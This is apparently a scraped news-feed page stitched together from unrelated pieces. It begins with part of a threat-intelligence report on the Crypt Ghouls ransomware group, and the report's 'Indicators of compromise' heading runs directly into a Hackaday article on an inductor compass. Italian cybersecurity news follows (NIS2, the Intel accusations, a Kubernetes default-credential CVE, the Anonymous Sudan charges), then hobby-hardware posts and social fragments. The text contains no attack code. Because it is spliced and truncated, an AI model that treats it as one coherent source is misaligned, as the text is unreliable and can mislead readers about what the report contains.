Shedding Zmiy is a group associated with the (Ex)Cobalt activity cluster. We found a further overlap in a report by Solar 4RAYS on this group-related incidents, namely the use of DLL sideloading with the dismcore.dll malicious loader. The report mentioned other familiar utilities and malware: resocks, SoftPerfect Network Scanner, and CobInt. In addition, Shedding Zmiy used VDSina to host its command-and-control servers. The similarities between the groups described above led to the conclusion that these attacks overlap with the activity of Crypt Ghouls. Our analysis of cybercriminal tools and tactics suggests that different groups may be collaborating, sharing resources, or exchanging intelligence. Other vendors have found evidence of the (Ex)Cobalt cluster members participating in these groups’ activities, and our analysis confirms this. Right now, we cannot say for sure that these campaigns are connected, but we anticipate their number will increase further. We will continue to monitor activity targeting Russian organizations.
Victims
Russian government agencies as well as mining, energy, finance, and retail companies have fallen victim to the Crypt Ghouls group.
Conclusion
Crypt Ghouls is another group attacking Russia. Cybercriminals are leveraging compromised credentials, often belonging to subcontractors, and popular open-source tools. These include modified configurations of the LockBit 3.0 and Babuk ransomware, whose builders and source code are publicly available. As the number of attackers using leaked builds increases, identifying the perpetrators of threats becomes increasingly difficult. The shared toolkit used in attacks on Russia makes it challenging to pinpoint the specific hacktivist groups involved. In the attacks carried out by the Crypt Ghouls, we have identified components of infrastructure and a variety of popular tools that are also used by many other groups. This suggests that the current actors are not only sharing knowledge but also their toolkits. All of this only makes it more difficult to identify specific malicious actors behind the wave of attacks directed at Russian organizations.
Indicators of compromise
Note: Network addresses specified in this section are valid at the time of publishing, but may change over time.
Some inventions are so simple that it’s hard to improve them. The magnetic compass is a great example — a magnetized needle, a bit of cork, and a bowl of water are all you need to start navigating the globe. So why in the world would you want to over-complicate things with something like this Earth inductor compass? Just because it’s cool, of course.
Now, the thing with complication is that it’s often instructive. The simplicity of the magnetic compass masks the theory behind its operation to some degree and completely fails to deliver any quantitative data on the Earth’s magnetic field. [tsbrownie]’s gadget is built from a pair of electric motors, one intact and one stripped of its permanent magnet stators. The two are mounted on a 3D printed frame and coupled by a long shaft made of brass, to magnetically isolate them as much as possible. The motor is powered by a DC supply while a digital ammeter is attached to the terminals on the stator.
When the motor spins, the stator at the other end of the shaft cuts the Earth’s magnetic lines of force and generates a current, which is displayed on the ammeter. How much current is generated depends on how the assembly is oriented. In the video below, [tsbrownie] shows that the current nulls out when oriented along the east-west axis, and reaches a maximum along north-south. It’s not much current — about 35 microamps — but it’s enough to get a solid reading.
Is this a practical substitute for a magnetic compass? Perhaps not for most use cases, but a wind-powered version of this guided [Charles Lindbergh]’s Spirit of St. Louis across the Atlantic in 1927 with an error of only about 10 miles over the trip, so there’s that. Other aircraft compasses take different approaches to the problem of nulling out the magnetic field of the plane.
youtube.com/embed/ikC4PPTIxJM?… Video istituzionale NIS2 – ACN Dal 16 ottobre 2024 è entrata in vigore la nuova normativa italiana sulla Network and Information Security (NIS). L’Agenzia per la cybersicurezza nazionale è l’Autorità competente per l’applicazione della NIS e punto di contatto unico, delineando un percorso graduale e sostenibile per consentire alle organizzazioni pubbliche e private di adempiere ai nuovi obblighi di legge.
Aumentano i campi di applicazione della normativa. I settori interessati diventano 18, di cui 11 altamente critici e 7 critici, coinvolgendo oltre 80 tipologie di soggetti, distinguendoli tra essenziali e importanti in relazione al livello di criticità delle attività svolte e del settore in cui operano. Quindi, maggiori obblighi per le misure di sicurezza e per la notifica degli incidenti e più potere di supervisione all’Agenzia e agli organi preposti alla risposta agli incidenti e alla gestione della crisi.
Sono previsti anche nuovi strumenti per la sicurezza informatica, come la divulgazione coordinata delle vulnerabilità, da realizzarsi attraverso la cooperazione e la condivisione delle informazioni a livello nazionale ed europeo.
Il percorso di attuazione L’adeguamento alla normativa NIS prevede un percorso sostenibile con una graduale implementazione degli obblighi.
Il primo passo, per i soggetti interessati, è quello di registrarsi al portale di ACN. C’è tempo dal 1° dicembre 2024 fino al 28 febbraio 2025 per le medie e grandi imprese e, in alcuni casi, anche per le piccole e le microimprese. Per agevolare il recepimento degli obblighi di notifica di incidente e delle misure di sicurezza, gli stessi verranno definiti in maniera progressiva e a valle delle consultazioni nell’ambito dei tavoli settoriali in seguito alle determine del Direttore Generale di ACN che saranno adottate entro il primo quadrimestre del 2025.
È prevista, inoltre, una finestra temporale di implementazione differenziata: 9 mesi per le notifiche e 18 mesi per le misure di sicurezza, decorrenti dalla data di consolidamento dell’elenco dei soggetti NIS (fine marzo 2025). Da aprile 2025 partirà quindi un percorso condiviso di rafforzamento della sicurezza informatica nazionale ed europea.
Mercoledì 16 ottobre, la Cyber Security Association of China (CSAC) ha pubblicato un articolo sul suo account ufficiale WeChat, denunciando quattro principali rischi informatici associati ai prodotti Intel. Tra queste vulnerabilità ci sono problemi di sicurezza frequenti, una scarsa reattività alle segnalazioni degli utenti, un monitoraggio degli utenti sotto il pretesto della gestione remota e la presenza di backdoor che minacciano la sicurezza della rete.
Il CSAC ha richiamato l’attenzione su vulnerabilità note, come quelle identificate con il nome “Downfall“ nel 2022 e nel 2023, che possono essere sfruttate dagli hacker per accedere a informazioni sensibili. Ha criticato Intel per continuare a vendere prodotti nonostante la consapevolezza di tali problemi e per la sua lenta risposta ai reclami degli utenti.
Inoltre, l’associazione ha accusato Intel di aver collaborato con Hewlett-Packard e altri produttori nella creazione di una specifica tecnica IPMI (Intelligent Platform Management Interface), utilizzata per monitorare i server, ma che presenta significativi rischi per la sicurezza a causa della sua funzione di monitoraggio remoto.
La CSAC ha evidenziato che una parte significativa del fatturato annuale di Intel, che supera i 50 miliardi di dollari, proviene dal mercato cinese. Ha messo in discussione l’impegno di Intel nei confronti della Cina, accusandola di danneggiare gli interessi nazionali cinesi e ha invitato le autorità cinesi a condurre un’analisi della sicurezza dei prodotti Intel per proteggere i diritti dei consumatori.
L’articolo ha anche menzionato il “Chip and Science Act” degli Stati Uniti, sostenendo che Intel ne è il principale beneficiario e che il provvedimento ha come obiettivo quello di escludere l’industria cinese dei semiconduttori, aggravando le tensioni tra le due potenze.
Rispondendo alle critiche, un portavoce di Intel ha sottolineato l’importanza della sicurezza per l’azienda e il suo impegno a collaborare con le autorità competenti. In un contesto di crescente rivalità tecnologica tra Stati Uniti e Cina, gli analisti ritengono che la posizione del CSAC potrebbe presagire un’indagine ufficiale da parte della Cyberspace Administration of China su Intel, simile a quella condotta l’anno scorso su Micron Technology.
Changelog: 🦝 fix: avoid crash in HTML rendering; 🦝 fix: text color for direct message conversation title; 🦝 fix: avoid dismissing bottom sheets on long press; 🦝 fix: avoid videos from being stretched out of viewport; 🦝 fix: avoid attachment loss when editing an existing post; 🦝 feat: add support for Markdown and conditional markup; 🦝 enhancement: add warning if alt text is missing in attachments; 🦝 enhancement: improve profile opening in links; 🦝 fix: create post with images and delete images from posts on Mastodon; 🦝 fix: avoid bug which prevented draft creation; 🦝 chore: add more unit tests; 🦝 feat: add possibility to copy post content to clipboard.
Ah, the Sinclair ZX Spectrum. A popular computer in Britain and beyond, but now rather thin on the ground. If you can’t find one, fear not, for now—you can apparently build a new one with new parts! [TME Retro] is here to demonstrate how.
Before you get excited, no—Sinclair has not risen from the dead. Instead, it’s simply down to the state of the retrocomputing community. There are enough reproduction parts and components out there for the ZX Spectrum that it’s now possible to assemble the whole computer from new bits. You can get new cases and new mechanical keyboards, and a 100% compatible motherboard in the form of the Harlequin board. The latter even reproduces the unobtainable Spectrum ULA glue logic chip in raw logic!
It’s neat to see the ZX Spectrum live on decades after the production lines ground to a halt. We’ve seen similar feats achieved with the legendary Commodore 64; you’d think we had enough of them given they were the best-selling computer of all time. Video after the break.
Kubernetes ha risolto una vulnerabilità critica che poteva consentire l’accesso SSH non autorizzato a una macchina virtuale che esegue un’immagine creata con Kubernetes Image Builder.
Con Kubernetes Image Builder, gli utenti possono creare immagini di macchine virtuali (VM) per vari provider API di cluster (CAPI), come Proxmox o Nutanix, che vengono eseguiti in un ambiente Kubernetes. Queste VM vengono poi utilizzate per creare nodi (server) che diventano parte del cluster Kubernetes.
Secondo il bollettino sulla sicurezza pubblicato, il bug critico ha ricevuto l’identificatore CVE-2024-9486 (punteggio CVSS 9.8) e colpisce le immagini VM create utilizzando Proxmox su Image Builder versione 0.1.37 o precedente.
L’essenza del bug è banale e risiede nell’uso delle credenziali predefinite, che sono attive durante il processo di creazione dell’immagine, ma non vengono disabilitate successivamente. Un utente malintenzionato consapevole del problema potrebbe connettersi tramite SSH e utilizzare le credenziali predefinite per ottenere l’accesso root alle macchine virtuali interessate.
Va notato che la vulnerabilità appare anche per le immagini create utilizzando Nutanix, OVA, QEMU, tuttavia in questi casi la vulnerabilità è considerata meno grave, poiché lo sfruttamento riuscito richiederà una serie di condizioni aggiuntive e lo sfruttamento è possibile solo durante l’assemblaggio. In questo caso, il bug viene tracciato come CVE-2024-9594 (punteggio CVSS 6.3).
Per risolvere la vulnerabilità, dovrai ricostruire le immagini interessate utilizzando Kubernetes Image Builder versione 0.1.38 o successiva, che imposta una password generata casualmente durante il processo di creazione e disabilita anche l’account del builder per impostazione predefinita al termine del processo.
Inoltre, una soluzione al problema potrebbe essere quella di disabilitare l’account del costruttore utilizzando il comando usermod -L builder.
Il Dipartimento di Giustizia degli Stati Uniti ha annunciato la presentazione di accuse contro due cittadini sudanesi che si trovano in custodia dal marzo 2024. Si ritiene che fossero membri del gruppo di hackerAnonymous Sudan, che ha effettuato più di 35.000 attacchi DDoS in un anno.
Ricordiamo che Anonymous Sudan è apparso nel 2023 e si è assunto la responsabilità di numerosi attacchi DDoS che hanno portato a massicce interruzioni nel funzionamento di una varietà di servizi in tutto il mondo.
Pertanto, il gruppo è diventato ampiamente noto a causa degli attacchi DDoS contro Microsoft, che hanno causato interruzioni nel lavoro di Outlook, Microsoft Teams, OneDrive for Business e SharePoint Online e hanno colpito anche la piattaforma Microsoft Azure.
Successivamente, il gruppo ha lanciato un attacco DDoS su larga scala contro X (ex Twitter), progettato per fare pressione su Elon Musk affinché lanciasse il servizio Starlink in Sudan. Di conseguenza, X ha riscontrato problemi evidenti per diverse ore.
Altri attacchi di Anonymous Sudan hanno preso di mira OpenAI, Riot Games, PayPal, Steam, Hulu, Netflix, Reddit, GitHub, Cloudflare, nonché agenzie governative e organizzazioni mediche in tutto il mondo, tra cui il Cedars-Sinai Hospital di Los Angeles, dove il DDoS ha interrotto la funzionamento di una serie di sistemi e i pazienti dovevano essere reindirizzati verso altri ospedali.
Allo stesso tempo, gli specialisti della sicurezza informatica ritengono che il gruppo, nonostante il nome, non sia collegato né agli hacktivisti originali di Anonymous Sudan, apparsi in Sudan nel 2019, né agli hacktivisti di Anonymous. Ma ci sono stati suggerimenti secondo cui il gruppo operava sotto falsa bandiera e potrebbe in realtà essere collegato alla Russia. Questi sospetti si sono intensificati quando gli hacker hanno annunciato la creazione di un “parlamento DARKNET” composto da altri hacker filo-russi, tra cui Killnet e REvil, e hanno poi preso parte ad un attacco alla Banca europea per gli investimenti (BEI).
Ora il Dipartimento di Giustizia degli Stati Uniti ha pubblicato un atto d’accusa contro due fratelli, cittadini del Sudan: Ahmed Salah Yousif Omer (Ahmed Salah Yousif Omer), 22 anni, e Alaa Salah Yusuuf Omer (Alaa Salah Yusuuf Omer), 27 anni. sospettati di gestire Anonymous Sudan e di aver partecipato ad attacchi.
Il procuratore Martin Estrada ha affermato che Anonymous Sudan è “il gruppo informatico più pericoloso in termini di attacchi DDoS” e che le motivazioni dei fratelli erano legate all’ideologia nazionalista sudanese. Secondo lui, i fratelli sono in custodia dal marzo di quest’anno, e da allora l’attività di Anonymous Sudan è cessata e le infrastrutture del gruppo sono state sequestrate. Non è noto in quale paese i sospettati siano stati arrestati, ma è noto che non sono in custodia negli Stati Uniti, sebbene siano stati interrogati dall’FBI.
Le forze dell’ordine hanno affermato che, a differenza di altri gruppi che effettuano attacchi DDoS, Anonymous Sudan non ha violato i dispositivi di altre persone per utilizzarli nelle loro azioni. Gli hacker hanno invece utilizzato gli strumenti Skynet Botnet o DCAT e server proxy.
“Ho intervistato i dipendenti di Amazon che stavano indagando sulle informazioni relative agli attacchi botnet Skynet contro i clienti di Amazon”, ha scritto l’agente speciale dell’FBI Elliott Peterson nei documenti del tribunale . “Hanno stabilito che gli attacchi non provenivano da dispositivi delle vittime compromessi, come di solito accade con le botnet, ma da dispositivi configurati per inoltrare automaticamente determinate categorie di traffico Internet. Tali risolutori proxy aperti sono dispositivi di “inoltro automatico”, ed è da loro che consisteva la parte pubblica della botnet Skynet, e spesso queste erano le uniche informazioni che le vittime degli attacchi Skynet potevano vedere durante l’analisi dei dati di rete.”
I sospettati sono accusati di associazione a delinquere finalizzata a causare danni a computer protetti, e Ahmed Omer è accusato di tre ulteriori capi di imputazione per aver causato danni a computer protetti separatamente da suo fratello.
Inoltre, Ahmed Omer ora rischia una pena massima fino all’ergastolo per aver messo incautamente in pericolo la vita di altre persone a causa del suddetto attacco all’ospedale Cedars-Sinai. Suo fratello, Alaa Salah, rischia fino a cinque anni di carcere.
Gli scienziati britannici sono riusciti ad accelerare le comunicazioni fino all’incredibile velocità di 938 gigabit al secondo. Ciò è stato fatto da un gruppo dell’University College di Londra guidato da Zhixin Liu. La loro tecnologia ha letteralmente superato di 9000 volte la prestazione media delle moderne reti 5G.
La nuova tecnologia consente di scaricare più di 20 lungometraggi al secondo. I ricercatori hanno stabilito un nuovo record per i dati multiplex, combinando più segnali in un unico flusso. O meglio, segnali di vario tipo.
È stata utilizzata una gamma di frequenze senza precedenti: da 5 a 150 gigahertz. La combinazione di onde radio e radiazioni luminose ha permesso di espandere notevolmente i canali di trasmissione dei dati. Fino a quel momento, i metodi elettronico e optoelettronico venivano utilizzati separatamente a causa delle difficoltà con la sincronizzazione della frequenza.
L’esperimento è stato originariamente condotto per valutare le potenziali capacità delle future reti 6G . Secondo Liu, se le reti 5G di oggi possono essere paragonate a una strada stretta e trafficata, la loro soluzione la trasforma in un’autostrada a dieci corsie.
Il team ha inoltre sviluppato un sistema ibrido di generazione del segnale. Per le frequenze da 5 a 75 GHz sono stati utilizzati convertitori digitale-analogici ad alta velocità. Per frequenze di onde millimetriche più elevate, comprese la banda W (75-110 GHz) e la banda D (110-150 GHz), è stata utilizzata la miscelazione di segnali modulati otticamente con laser a fotodiodo stabilizzati in frequenza.
Il rumore di fase viene ridotto sincronizzando due coppie di laser a linea stretta rispetto a un comune oscillatore al quarzo. Questo approccio ha permesso di utilizzare nel modo più efficiente l’intero spettro di frequenze disponibile. Utilizzando il formato OFDM (multiplexing a divisione di frequenza ortogonale) e il caricamento dei bit, i ricercatori hanno raggiunto velocità di trasferimento dati di 938 Gbps con intervalli minimi tra le diverse bande, inferiori a 300 MHz.
Sebbene il set di record si riferisca a dati multiplex, i singoli segnali sono stati trasmessi ancora più velocemente, a una velocità di oltre un terabit al secondo.
Il team di Liu è già in trattative con produttori di smartphone e operatori di telecomunicazioni sulle applicazioni pratiche della tecnologia. Parallelamente, le società di telecomunicazioni giapponesi hanno presentato il proprio dispositivo per le reti 6G, in grado di trasmettere dati 20 volte più velocemente del 5G. Il loro sviluppo garantisce velocità di 100 Gbit/s su una distanza fino a 100 metri.
La nuova tecnologia è particolarmente importante per lo sviluppo delle reti radio di prossima generazione (RAN), che richiedono velocità di trasmissione dati wireless ultra elevate tra le stazioni base – più di 100 Gbps – per connettere punti di accesso e siti di comunicazione.
I servi dell'UE non si smentiscono mai cari connazionali. Prepariamoci alle restrizioni e tasse. Giorgetti annuncia l'accordo tra UE e Italia: 7 anni di austerità per ridurre il debito - L'INDIPENDENTE lindipendente.online/2024/10/1…
Redbox was a service for renting DVDs from automated kiosks. The business was going well until it wasn’t anymore, and then the company went bankrupt in July this year. And yet… the machines live on. At least, that’s according to YouTuber [Smokin’ Silicon], who spotted some remaining Redbox kiosks out and about. Including at his local Walmart!
Here’s the thing. There’s not one big switch at Redbox that turns all the machines off, and even if there was—nobody hit it the moment the company declared bankruptcy. Thus, when [Smokin’ Silicon] rocked up to Walmart, he was able to flick through the movies and even add one to cart for purchase. However, trying to complete the transaction failed—the kiosk eventually reported itself as out of service. That makes sense—you’d expect payment processing to be the first thing to go down.
However, other Redbox kiosks were different. A kiosk at a Food Lion location actually still worked—and [Smokin’ Silicon] was able to complete the transaction and walk away with a Black Adam disc! On a second trip, he was able to walk away with even more!
The rest of the video dives into Redbox lore and other posts online about the status of the company, software, and hardware. Apparently, someone on Reddit was claiming they had the Redbox kiosk OS available. Meanwhile, some users have had trouble returning their discs because the company is now defunct. However, [Smokin’ Silicon] was able to return his without issue. Ultimately, though, he recommends his viewers to go out and score as many DVDs and Blu Rays as possible from the machines since soon enough, they’ll be gone forever.
The fact is, businesses are big and Kafkaesque, the kiosks are scattered all over the country, and so it’s anybody’s guess if and when they stop working. Back when this website began, a redbox was something different entirely. Video after the break.
If you get an inexpensive diode laser cutter, you might have been disappointed to find it won’t work well with transparent acrylic. The material just passes most of the light at that wavelength, so there’s not much you can do with it. So how did [Rich] make a good-looking sign using a cheap laser? He used a simple paint and mask technique that will work with nearly any clear material, and it produces great-looking results, as you can see in the video below.
[Rich] starts with a piece of Acrylic covered with paper and removes the paper to form a mask. Of course, even a relatively anemic laser can slice through the paper covering with no trouble at all. He also cuts an outline, which requires a laser to cut the acrylic. However, you could easily apply this to a rectangular hand-cut blank. Also, most diode lasers can cut thin acrylic, but it doesn’t always come out as cleanly as you’d like.
We wondered why [Rich] didn’t mirror image the graphic and then found out he simply forgot. So, the first pass through the laser doesn’t produce the piece he actually worked with later in the video. We are glad to know we aren’t the only ones who do things like that.
Using a pick, he removes some of the cut paper to reveal the parts he wants to paint a particular color. Then he removes more parts and paints again. The trick is, of course, that he’s painting the back of the acrylic, so the top layer shows through. In this case, he removes part of the mask and paints it orange. Then, he removes the mask that covers the black parts and paints it black. Finally, he removes the rest of the mask, which covers parts that will remain clear or show the paper backing if you leave it on.
If you have a laser and you haven’t discovered [Rich’s] channel, you will spend the rest of the day there. He has numerous tips and techniques for all kinds of lasers. He even turned us on to standoff pins. If you want a deep dive into acrylic, here you go.
@Informatica (Italy e non Italy 😁) Il Dipartimento di Giustizia degli Stati Uniti ha recentemente accusato gli operatori di “Anonymous Sudan” di aver condotto attacchi DDoS (Distributed Denial of Service) contro infrastrutture critiche. Questi attacchi hanno preso di mira vari settori,
@Notizie dall'Italia e dal mondo Le prime analisi dimostrano l'uccisione del leader del movimento palestinese. Israele attende la conferma definitiva dall'esame del DNA. Sinwar sarebbe stato ucciso durante uno scambio a fuoco e non per un'esecuzione mirata. L'articolo Israele: “Abbiamo ucciso Sinwar”. L’offensiva a
Sometimes you need to create a satellite navigation tracking device that communicates via a low-power mesh network. [Powerfeatherdev] was in just that situation, and they whipped up a particularly compact solution to do the job.
As you might have guessed based on the name of its creator, this build is based around the ESP32-S3 PowerFeather board. The PowerFeather has the benefit of robust power management features, which makes it perfect for a power-sipping project that’s intended to run for a long time. It can even run on solar power and manage battery levels if so desired. The GPS and LoRa gear is all mounted on a secondary “wing” PCB that slots directly on to the PowerFeather like a Arduino shield or Raspberry Pi HAT. The whole assembly is barely larger than a AA battery.
It’s basically a super-small GPS tracker that transmits over LoRa, while being optimized for maximum run time on limited power from a small lithium-ion cell. If you’re needing to do some long-duration, low-power tracking task for a project, this might be right up your alley.
LoRa is a useful technology for radio communications, as we’ve been saying for some time. Meanwhile, if you’ve got your own nifty radio comms build, or anything in that general milleu, don’t hesitate to drop us a line!
HMD Global ha introdotto una funzionalità molto interessante nell’ultimo aggiornamento software per lo smartphone Skyline targato Nokia. La modalità, chiamata Digital Detox, aiuta gli utenti a ridurre il tempo trascorso sui social media e a migliorare la concentrazione sul lavoro bloccando selettivamente alcune app che distraggono.
L’idea principale è la possibilità di configurare il blocco di applicazioni e contatti specifici, completamente o parzialmente. Gli utenti possono scegliere autonomamente quali applicazioni bloccare, siano esse social network, client di posta elettronica o qualsiasi altro programma di distrazione. Per attivare la modalità, è presente sia un widget separato sulla schermata principale sia un pulsante nel pannello delle impostazioni rapide dello smartphone.
Digital Detox offre il blocco fino a 14 categorie di applicazioni con la possibilità di creare un elenco di eccezioni. Attivando questa modalità, le icone delle applicazioni bloccate vengono sostituite da cerchi neri con un lucchetto, che segnalano che questi programmi non sono disponibili per un certo periodo. Cioè, l’utente non solo non riceverà notifiche dalle applicazioni bloccate, ma non potrà nemmeno accedervi.
Esistono diversi livelli di blocco: Soft Lock, che può essere disabilitato manualmente, e Hard Lock, che non può essere annullato prima dello scadere del tempo impostato. Il blocco può essere attivato per qualsiasi intervallo di tempo fino a 24 ore. Si presuppone che l’utente lo accenda volontariamente per focalizzare la sua attenzione su compiti importanti. Anche se a prima vista la funzionalità sembra interessante e utile, gli utenti hanno scoperto che il blocco delle app non si estende al browser web. Ciò significa che l’accesso ai social network tramite esso sarà comunque possibile, anche se le applicazioni corrispondenti saranno bloccate. Nonostante ciò, HMD intende migliorare la tecnologia nei futuri aggiornamenti.
For some time now, Apple has developed a reputation for manufacturing computers and phones that are not particularly repairable or upgradable. While this reputation is somewhat deserved, especially in recent years, it seems less true for their older machines. With the second and perhaps most influential computer, the Apple II, being so upgradable that the machine had a production run of nearly two decades. Similarly, the Macintosh Plus of 1986 was surprisingly upgradable and repairable and [Hunter] demonstrates its capabilities by bringing one onto the modern Internet, albeit with a few tricks to adapt the old hardware and software to the modern era.
The Mac Plus was salvaged from a thrift store, and the first issue to solve was that it had some rotten capacitors that had to be replaced before the computer could be reliably powered on at all. [Hunter] then got to work bringing this computer online, with the only major hardware modification being a BlueSCSI hard drive emulator which allows using an SD card instead of an original hard disk. It can also emulate an original Macintosh Ethernet card, allowing it to fairly easily get online.
The original operating system and browser don’t support modern protocols such as HTTPS or scripting languages like Javascript or CSS, so a tool called MacProxy was used to bridge this gap. It serves simplified HTML from the Internet to the Mac Plus, but [Hunter] wanted it to work even better, adding modular domain-specific handling to allow the computer to more easily access sites like Reddit, YouTube, and even Hackaday, although he does call us out a bit for not maintaining our retro page perhaps as well as it ought to be.
[Hunter] has also built an extension to use the Wayback Machine to serve websites to the Mac from a specific date in the past, which really enhances the retro feel of using a computer like this to access the Internet. Of course, if you don’t have original Macintosh hardware but still want to have the same experience of the early Internet or retro hardware this replica Mac will get you there too.
Automattic CEO Matt Mullenweg made another buyout offer this week, and threatened employees who speak to the press with termination.#wordpress #News #automattic
Moonrise2473
in reply to Andrea Russo • • •Andrea Russo
in reply to Moonrise2473 • •Notizie dall'Italia e dal mondo reshared this.